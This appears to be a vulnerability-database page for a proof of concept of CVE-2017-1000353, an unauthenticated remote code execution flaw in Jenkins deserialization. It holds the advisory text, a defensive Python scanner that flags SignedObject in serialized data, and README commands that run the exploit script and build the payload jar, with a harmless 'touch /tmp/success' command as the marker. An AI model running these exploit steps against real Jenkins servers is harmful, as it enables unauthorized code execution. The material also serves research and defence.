CVE-2017-1000353 PoC — CloudBees Jenkins Code Issue Vulnerability

Source
Associated Vulnerability
Title: CloudBees Jenkins Code Issue Vulnerability (CVE-2017-1000353)
Description:Jenkins versions 2.56 and earlier as well as 2.46.1 LTS and earlier are vulnerable to an unauthenticated remote code execution. An unauthenticated remote code execution vulnerability allowed attackers to transfer a serialized Java `SignedObject` object to the Jenkins CLI, that would be deserialized using a new `ObjectInputStream`, bypassing the existing blacklist-based protection mechanism. We're fixing this issue by adding `SignedObject` to the blacklist. We're also backporting the new HTTP CLI protocol from Jenkins 2.54 to LTS 2.46.2, and deprecating the remoting-based (i.e. Java serialization) CLI protocol, disabling it by default.
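
A defender-side check for the class named in the description above, as an added example that is not part of the PoC repository or of Jenkins: it heuristically scans raw bytes for Java serialization class descriptors and reports denylisted names. The function names, the `org.example.Inner` class and the sample blobs are constructed for illustration.

```python
import string
import struct

STREAM_MAGIC = b"\xac\xed\x00\x05"  # Java serialization magic + version
TC_CLASSDESC = 0x72                  # marks a new class descriptor
NAME_CHARS = set((string.ascii_letters + string.digits + "._$[;").encode())
# Class named in the advisory text above; extend with your own policy.
DENYLIST = {"java.security.SignedObject"}

def class_names(data: bytes) -> list:
    """Heuristically list class names from TC_CLASSDESC records in raw bytes."""
    names, i = [], 0
    while i + 3 <= len(data):
        if data[i] == TC_CLASSDESC:
            (n,) = struct.unpack_from(">H", data, i + 1)
            raw = data[i + 3:i + 3 + n]
            # A descriptor is: name length, name, 8-byte serialVersionUID, flags.
            fits = 0 < n <= 256 and i + 3 + n + 9 <= len(data)
            if fits and all(b in NAME_CHARS for b in raw):
                names.append(raw.decode("ascii"))
                i += 3 + n + 8  # skip the name and serialVersionUID
                continue
        i += 1
    return names

def denied_classes(data: bytes) -> list:
    """Return denylisted class names found anywhere in a serialized blob."""
    if STREAM_MAGIC not in data:
        return []
    return sorted(set(class_names(data)) & DENYLIST)

def sample_object(name: str) -> bytes:
    """Constructed sample: TC_OBJECT + descriptor for a field-less class."""
    n = name.encode()
    return (b"\x73\x72" + struct.pack(">H", len(n)) + n
            + b"\x00" * 8 + b"\x02\x00\x00\x78\x70")

# Constructed, simplified blobs (not captured traffic). A real SignedObject
# carries the inner stream in a byte[] field; here it is simply appended.
WRAPPED = (STREAM_MAGIC + sample_object("java.security.SignedObject")
           + STREAM_MAGIC + sample_object("org.example.Inner"))
PLAIN = STREAM_MAGIC + sample_object("java.util.ArrayList")

if __name__ == "__main__":
    for label, blob in (("wrapped", WRAPPED), ("plain", PLAIN)):
        print(label, class_names(blob), "denied:", denied_classes(blob))
```

Because it reads raw bytes instead of deserializing, the scan also lists class names inside a nested stream, which a blacklist applied only to the outer `ObjectInputStream` never sees.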
Description
jenkins CVE-2017-1000353 POC
Readme
# CVE-2017-1000353 POC

How to reproduce the Jenkins CVE-2017-1000353?

Clone this repository, then use the pre-built payload `jenkins_poc.ser` with the following command:

```
python exploit.py http://your-ip:8080 jenkins_poc.ser
```

The command `touch /tmp/success` will then be executed.

How to generate the payload `jenkins_poc.ser`?

Download [CVE-2017-1000353-SNAPSHOT-all.jar](https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar).

```
java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
```

Reference:

https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2017-1000353
File Snapshot

```
[4.0K] /data/pocs/ada29b9ee00ba3da741b59fa94f99a82a00fd0fc
├── [  80] CVE20171000353.iml
├── [2.0K] exploit.py
├── [2.4K] jenkins_poc.ser
├── [2.7K] pom.xml
├── [ 648] README.md
└── [4.0K] src
    └── [4.0K] main
        └── [4.0K] java
            └── [4.0K] org
                └── [4.0K] vulhub
                    └── [5.8K] Payload.java

5 directories, 6 files
```